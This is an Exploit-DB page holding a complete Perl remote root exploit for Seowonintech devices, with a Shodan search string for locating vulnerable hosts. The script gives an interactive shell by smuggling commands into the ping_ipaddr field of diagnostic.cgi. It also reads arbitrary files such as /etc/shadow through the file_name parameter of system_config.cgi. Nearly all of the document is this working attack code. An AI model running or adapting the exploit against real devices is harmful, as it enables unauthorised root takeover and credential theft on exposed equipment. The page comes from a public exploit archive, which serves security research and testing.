Seowonintech Devices - Remote Command Execution

EDB-ID:

26412

CVE:


EDB Verified:

Author:

Todor Donev

Type:

remote

Exploit:   /  

Platform:

Hardware

Date:

2013-06-24

Vulnerable App: 
#!/usr/bin/perl
#       
#  [+] Seowonintech all device remote root exploit v2
# =====================================================
# author:                 | email:
# Todor Donev  (latin)    | todor dot donev 
# Òîäîð Äîíåâ  (cyrillic) | @googlemail.com    
# =====================================================
# type:    | platform:    | description:
# remote   | linux        | attacker can get root
# hardware | seowonintech | access on the device
# =====================================================
# greetings to:
# Stiliyan Angelov,Tsvetelina Emirska,all elite 
# colleagues and all my friends that support me. 
# =====================================================
# warning:
# Results about 37665 possible vulnerabilities
# from this exploit.
# =====================================================
# shodanhq dork: 
# thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
# =====================================================
# P.S. Sorry for buggy perl.. :)
# 2o13 Hell yeah from Bulgaria, Sofia
#
#    Stop Monsanto Stop Monsanto Stop Monsanto
#
#       FREE GOTTFRID SVARTHOLM WARG FREE
# GOTTFRID SVARTHOLM WARG is THEPIRATEBAY co-founder 
# who was sentenced to two years in jail by Nacka 
# district court, Sweden on 18.06.2013 for hacking into
# computers at a company that manages data for Swedish
# authorities and making illegal online money transfers.
 
use LWP::Simple qw/$ua get/;
my $host  =  $ARGV[0] =~ /^http:\/\// ?  $ARGV[0]:  'http://' . $ARGV[0];
if(not defined $ARGV[0])
{
     usg();
     exit;
}
print "[+] Seowonintech all device remote root exploit\n";
$diagcheck = $host."/cgi-bin/diagnostic.cgi";
$syscheck = $host."/cgi-bin/system_config.cgi";
$res = $ua->get($diagcheck) || die "[-] Error: $!\n";
print "[+] Checking before attack..\n";
if($res->status_line != 200){
     print "[+] diagnostic.cgi Status: ".$res->status_line."\n";
     }else{
     print "[o] Victim is ready for attack.\n";
     print "[o] Status: ".$res->status_line."\n";  
     if(defined $res =~ m{selected>4</option>}sx){
     print "[+] Connected to $ARGV[0]\n";
     print "[+] The fight for the future Begins\n";
     print "[+] Exploiting via remote command execution..\n";
     print "[+] Permission granted, old friend.\n";
     &rce;
     }else{
     print "[!] Warning: possible vulnerability.\n";
     exit;
    }   
  }
$res1 = $ua->get($syscheck) || die "[-] Error: $!\n";
if($res1->status_line != 200){
     print "[+] system_config.cgi Status: ".$res1->status_line."\n";
     exit;
     }else{
     print "[+] Trying to attack via remote file disclosure release.\n";
     if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){
     print "[+] Victim is ready for attack.\n";
     print "[+] Connected to $ARGV[0]\n";
     print "[o] Follow the white cat.\n";
     print "[+] Exploiting via remote file dislocure..\n";
     print "[+] You feeling lucky, Neo?\n";
     &rfd;
     }else{
     print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";
     exit;
    }
  }
sub rfd{
while(1){ 
     print "# cat ";
     chomp($file=<STDIN>);
     if($file eq ""){ print "Enter full path to file!\n"; }
     $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
     $data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
     $data =~ s/Null/File not found!/gs;
     if (defined $data =~ m{rows="30">(.*?)</textarea>}sx){
     print $1."\n";
     }
   }
}
sub rce{
while(1){ 
     print "# ";
     chomp($rce=<STDIN>);
     $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
     $rce =~ s/\|/\;/;
     if($rce eq ""){print "enter Linux command\n";}
     if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
     if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}
     $data=get($bug) || die "[-] Error: $!\n";
     if (defined $data =~ m{(\s.*) Content-type:}sx){
     $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
     $result =~ s/ loss\n//;     
     $result =~ s/ ms\n//;
     print $result;
    }
  }
}
sub usg
{
     print " [+] Seowonintech all device remote root exploit\n";
     print " [!] by Todor Donev todor dot donev @ googlemail.com\n";
     print " [?] usg: perl $0 <victim>\n";
     print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";
     print " [1] exmp xpl RCE: # uname -a :)\n";
     print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services